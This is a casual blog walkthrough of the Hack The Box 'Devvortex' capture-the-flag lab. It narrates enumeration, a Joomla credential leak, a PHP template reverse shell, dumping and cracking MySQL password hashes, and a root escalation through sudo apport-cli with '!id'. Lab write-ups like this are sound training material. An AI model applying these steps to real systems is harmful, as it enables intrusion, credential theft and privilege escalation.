DEVVORTEX HTB
Devvortex ; Hack the Box
Wagwan my mates, how’s it going, we’re back again giving y’all the most detailed walkthrough of labs on hack the box, without much blabity-blab, let’s get into it.
So first, as usual we do a Nmap scan and see what’s going on with this lab.
nothing much, that’s all that came up, we can see ssh, we reserve that for later , and then an http service, so then i went ahead to my browser and then input the ip address 10.10.11.242
and then it didn’t go through but a name was prompted in the browser search bar, so i went ahead to add the ip-address and the name that came up (devvortex.htb) to the /etc/hosts just do nano and add it.
so when that was done, i went ahead and checked the domain, so it eventually went through.
so immediately this came up, i bust out my tool, i love to use this tool for directory search, which i highly recommend, not much useless parameters, very straightforward. That is the dirsearch tool.
nothing much came out again, as we can see, not much “200 OK” lol
so still figuring out what to do, i checked throughout the devvortex.htb site to see what’s up, even the source code, which i recommend you to always check when doing CTF’s but nothing much either, then i thought, vhosts/subdomain why not?
fortunately i used gobuster and it gave me something. ngl gobuster gave me a lil bit of headache..i kept using VHOST instead of DNS, spent some time around this, but got it..hey we’re all learning lol
so i got dev.devvortex.htb, i proceeded without caution to check it out.
so, same methodology, checked throughout the site and the source code and tested every functionality, but no avail, then i figured, directory enumeration, no stress, i bust out the dirsearch tool again and it did not disappoint me lol
seen all that was there, i saw the README.txt, did not hesitate to check it, found out it was operating on joomla 4.2..how blissful.
While checking for joomla 4.2 exploit, i checked the /Administrator path and found a login page. you know me, i’m there Asap :[ ]
so eventually i found an Exploit on GitHub for joomla, exfiltration tool that this version is vulnerable to.
so i did that, one thing that fucked with me a lot on this box is the spelling of devvortex. i kept running the exploit against devortex.htb (one v) instead of devvortex.htb(two v’s), but i found out and was on my way to hacking this box.
so after i ran the tool, i got the login information of the /Administrator path and it worked!
so i got in and obviously the next step is to find a reverse shell and there’s a lot of functionality in this admin page, checked and checked, i tried the upload, nothing much, ngl i got a little hint here, so i checked the templates and saw that it’s got them php tings, hehe
so i navigated to where the templates where kept, and note, admin templates, because the login we got is an administrator
so did that and saw the php files and just thought of using a one-liner for the shell and put it in the exec function, nothing big..
so i decided, idex.php. Note if you want to use any other php file, you’ll have to navigate to the path to trigger your code
so i used This payload and edited it with my ip address and my desired port
and then i bust out netcat on my local machine and started listening for incoming connection on that port.
i did that and clicked save, i did not even need to refresh it, and i got shell, because i was currently operating on the index.php/…..
so i navigated to the home/logan directory but can’t ‘cat’ the user flag, so apparently we need logan shell, if you remember from the output of the ruby script, we had a “logan” user
so i spent alot of time here tho and finally tried mysql and saw a response, which tells me that we can run some sql queries to check for the user passwords and the next thing is to check if lewis, our current user can do sql queries, apparently he could. but when i first did, the sql was not interactive, i had to google what's wrong, but i’ll urge you to put it in whatever you do so you don’t have problems of non-interactive shell, so i got an interactive shell using python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
and then ran the sql command so i can interact with the database
‘mysql -u lewis -p’
and it prompted me for password, did that and i was in the database, ready to make queries to find out the password hash of the “logan” user
so i did that, but i got an error, no database in use, so i just ran use joomla
and ran show tables and i eventually saw a table with something_users, i immediately checked it and ran select all from that table, that will translate to SELECT * FROM sd4fg_users in the sql query and i got a response with the users and specified password hash
so without wasting much effort, i bust out the hashcat, which i do like better than JohntheRipper , so figuring out that it was a bcrypt type of hashing, you use -m 3200 when cracking, so i finally cracked the hash and got the password for logan
so with the parameters i have, ssh seems plausible, plus it was in the nmap output that there was the ssh service on port 22..lol that's the default port.
but no time to waste, i did that and i got into the logan shell and went straight for the jugular, cat /home/logan/user.txt
and got the user flag.
ROOT [PRIVILEDGE ESCALATION]
i’m not gon’ lie, gave me a little stress here, but eventually, it was something so simple to figure out
so i did linpeas, which is basically the first thing i always do when i break into a Linux box, and then i did that, but wasted my time, quite a lot and then if you did some courses on the academy of hack the box, i always do whatever i practice on there, so there is this command, sudo -l which i did and it’’ give you like a sudo bypass, if there is any.
so after doing that, it brought a command that all users can run in the terminal, so i entered google and just copied and paste what came out and appended it with poc exploit and i found this
so i tried it and it worked, so let’s dive into how i tried it. first thing, if you check the github poc, there should be a .crash file in the /var/crash directory, and as you can see, i listed the contents of the directory immediately and apparently there was a .crash file and then i proceeded to use the poc i found
so i ran “ sudo /usr/bin/apport-cli -c /var/crash/the_crash_file.crash “ which will then eventualy prompt you to choose an option and the you choose V this is me following the poc to the letter :[)
so I ran the the command and chose v and then it started loading the crash file.
and when it get’s to the point where you see this : (the column sign), just input ‘ !id ’ automatically it gives you root access but basically it’s the ! (exclamation mark) that triggers the root, and then cat /root/root.txt . it was a fun box, and above all, the point is to learn on each box you pawn.
you can reach me at 0x_Leo_nidas300@proton.me or on twitter at _0xLeonidas
That’s it peeps, see you lots later, peace!✊🏿✊🏿
